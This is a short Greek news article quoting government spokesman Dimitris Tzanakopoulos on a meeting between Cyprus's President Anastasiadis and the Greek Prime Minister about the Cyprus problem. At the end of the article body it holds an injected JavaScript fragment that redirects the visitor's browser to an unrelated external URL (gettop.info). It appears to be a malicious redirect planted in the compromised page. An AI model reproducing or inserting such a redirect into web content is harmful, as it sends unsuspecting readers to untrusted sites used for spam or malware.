Τζανακόπουλος: Η λύση στο κυπριακό να είναι δίκαιη και βιώσιμη

0
5

 

«Σταθερή θέση της Ελληνικής Δημοκρατίας είναι η κατάργηση του αναχρονιστικού καθεστώτος των εγγυήσεων καθώς και η αποχώρηση των τουρκικών στρατευμάτων, έτσι ώστε η λύση που θα δοθεί στο κυπριακό πρόβλημα να είναι μια λύση δίκαιη και βιώσιμη», τόνισε ο Υπουργός Επικρατείας και Κυβερνητικός Εκπρόσωπος, Δημήτρης Τζανακόπουλος μιλώντας στo ΡΙΚ.

«Εγινε μια εξαιρετικά καλή συνάντηση μεταξύ του Κύπριου Προέδρου, κυρίου Αναστασιάδη, και του Έλληνα Πρωθυπουργού, η οποία κράτησε περισσότερο από μιάμιση ώρα. Υπήρξε μια αναλυτική ενημέρωση εκ μέρους του κυρίου Αναστασιάδη στον Έλληνα Πρωθυπουργό για τις διαβουλεύσεις και τις διαπραγματεύσεις που έγιναν στην Ελβετία.

Επιβεβαιώθηκε, για άλλη μια φορά, η στήριξη της ελληνικής κυβέρνησης στην προσπάθεια για τη δίκαιη και βιώσιμη επίλυση του κυπριακού προβλήματος και από εκει και πέρα, οι δυο ηγέτες συμφώνησαν ότι θα είναι σε διαρκή επικοινωνία και συντονισμό, όπως και όλο το προηγούμενο διάστημα» τόνισε ο κ.Τζανακόπουλος και πρόσθεσε: «Η σταθερή θέση της Ελληνικής Δημοκρατίας είναι η κατάργηση του αναχρονιστικού καθεστώτος των εγγυήσεων καθώς και η αποχώρηση των τουρκικών στρατευμάτων, έτσι ώστε η λύση που θα δοθεί στο κυπριακό πρόβλημα να είναι μια λύση δίκαιη και βιώσιμη. Αλλά αυτά είναι θέσεις που είναι εκπεφρασμένες και πάγιες θέσεις της Ελληνικής Δημοκρατίας, όπως γνωρίζετε πολύ καλά» κατέληξε σχετικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here